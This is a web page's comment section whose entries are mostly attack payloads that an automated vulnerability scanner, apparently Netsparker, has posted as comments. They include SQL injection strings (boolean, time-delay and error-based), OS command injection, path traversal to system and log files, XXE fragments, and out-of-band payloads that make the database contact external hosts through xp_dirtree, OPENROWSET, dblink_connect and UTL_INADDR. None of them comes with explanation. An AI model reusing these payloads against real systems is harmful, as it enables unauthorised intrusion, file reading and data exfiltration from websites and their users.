163 Comments

  1. 3

  2. Comment *

  3. Comment *

  4. 3

  5. -1 OR 1=1

  6. -1′ OR 1=1 OR ‘ns’=’ns

  7. -1′ OR 1=1 OR ‘1’=’1

  8. ‘&ping -w 25 127.0.0.1 &’

  9. ping -w 25 127.0.0.1 &

  10. ping -n 25 127.0.0.1

  11. -1 AND ‘NS=’ss

  12. -1″ OR 1=1 OR “ns”=”ns

  13. 1′;expr 268409241 – 65131;’

  14. expr 268409241 – 40529;

  15. expr 268409241 – 88134

  16. ‘+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +’

  17. ‘AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or ‘1’=’

  18. -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

  19. 1 WAITFOR DELAY ‘0:0:25’– /* 299e7456-488b-4aa2-9848-c4d1ca3ff745 */

  20. cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

  21. WAITFOR DELAY ‘0:0:25’– /* 581b120a-fc2c-4b20-ab22-6e2d31bcede9 */

  22. ‘+NSFTW+’

  23. -1’+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+’

  24. ((select sleep(25)))a– 1 /* 53a050b1-19c4-4de3-ade7-1fd5a5bef48f */

  25. SELECT pg_sleep(25)– /* a771f0ea-b54a-401a-8ef8-b3a66cd48a8c */

  26. 1);SELECT pg_sleep(25)– /* d8ae9036-2825-4c9c-8d72-b4146c270932 */

  27. -1′ or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+’ /* 39ffbb6c-ecc5-490c-9fa0-70e878cbea69 */

  28. ‘+netsparker(0x0491E1)+’

  29. ‘+netsparker(0x0491E2)+’

  30. ‘ AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)– 1 /* 2066e0b1-7d32-4d9c-ab50-f1b5f030d763 */

  31. netsparker(0x0491EA)

  32. //r87.com/?0x049211

  33. ns:netsparker056650=vuln

  34. c:\boot.ini

  35. response.write(268409241-52474)’

  36. file:///windows/win.ini

  37. ….//….//….//….//….//….//….//….//….//….//….//windows/win.ini

  38. …..///…..///…..///…..///…..///…..///…..///…..///…..///…..///…..///windows/win.ini

  39. ‘+print localtime()*0+0xFFF9999-88964+’

  40. p “#{0xFFF9999.to_i-`echo 35250`.to_i}”

  41. p “#{0xFFF9999.to_i-`echo 68544`.to_i}”

  42. __import__(‘os’).popen((‘expr 268409241 – {0}’).format(‘5329’)).read()

  43. WEB-INF/web.xml

  44. /../../../../../../../../../../var/log/nginx/access.log

  45. /../../../../../../../../../../opt/lampp/logs/access_log

  46. /../../../../../../../../../../var/log/apache/access.log

  47. //odubghucyc6umtpdeazpemjcdjhn9ukvlqfbqqaji9q.r87.me

  48. <!DOCTYPE r [ %dtd;]>&a;

  49. <!DOCTYPE r [ %dtd;]>&a;

  50. 127.0.0.1/trace.axd

  51. [::1]/trace.axd

  52. 127.0.0.1/elmah.axd

  53. [::1]/elmah.axd

  54. syscolumns WHERE 2>3;exec(‘xp_dirtree ”\\odubghucyc7a1hm28kz-ydrcxvzfwnh0kyzyfqzl’+’bv4.r87.me’+’\c$\a”’)–

  55. 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = ‘SELECT * FROM OPENROWSET(”SQLOLEDB”,”@”;”a”;”1”,”SELECT 1”)’SET @r=replace(@q,’@’,’odubghucycdpqo0m0oabdkgs3ny-5a96plog7rmf’+’tey.r87.me’)exec sp_executesql @r–

  56. -1′;DECLARE @q varchar(999),@r nvarchar(999)SET @q = ‘SELECT * FROM OPENROWSET(”SQLOLEDB”,”@”;”a”;”1”,”SELECT 1”)’SET @r=replace(@q,’@’,’odubghucycb7pxctn8tz-pt0fejm0-z9qktub6kg’+’5z4.r87.me’)exec sp_executesql @r–

  57. 134.186.116.57/elmah

  58. cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(111)||chr(100)||chr(117)||chr(98)||chr(103)||chr(104)||chr(117)||chr(99)||chr(121)||chr(99)||chr(116)||chr(116)||chr(112)||chr(106)||chr(117)||chr(102)||chr(97)||chr(121)||chr(119)||chr(57)||chr(108)||chr(113)||chr(120)||chr(111)||chr(113)||chr(119)||chr(104)||chr(109)||chr(56)||chr(121)||chr(115)||chr(107)||chr(97)||chr(107)||chr(109)||chr(102)||chr(103)||chr(118)||chr(113)||chr(103)||chr(55)||chr(51)||chr(113)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)

  59. ‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(111)||chr(100)||chr(117)||chr(98)||chr(103)||chr(104)||chr(117)||chr(99)||chr(121)||chr(99)||chr(104)||chr(107)||chr(102)||chr(102)||chr(100)||chr(50)||chr(117)||chr(121)||chr(45)||chr(49)||chr(51)||chr(100)||chr(115)||chr(119)||chr(115)||chr(113)||chr(114)||chr(112)||chr(55)||chr(99)||chr(101)||chr(104)||chr(50)||chr(102)||chr(107)||chr(120)||chr(106)||chr(57)||chr(112)||chr(119)||chr(119)||chr(110)||chr(121)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||’

Submit a Comment

Your email address will not be published. Required fields are marked *

10 + fourteen =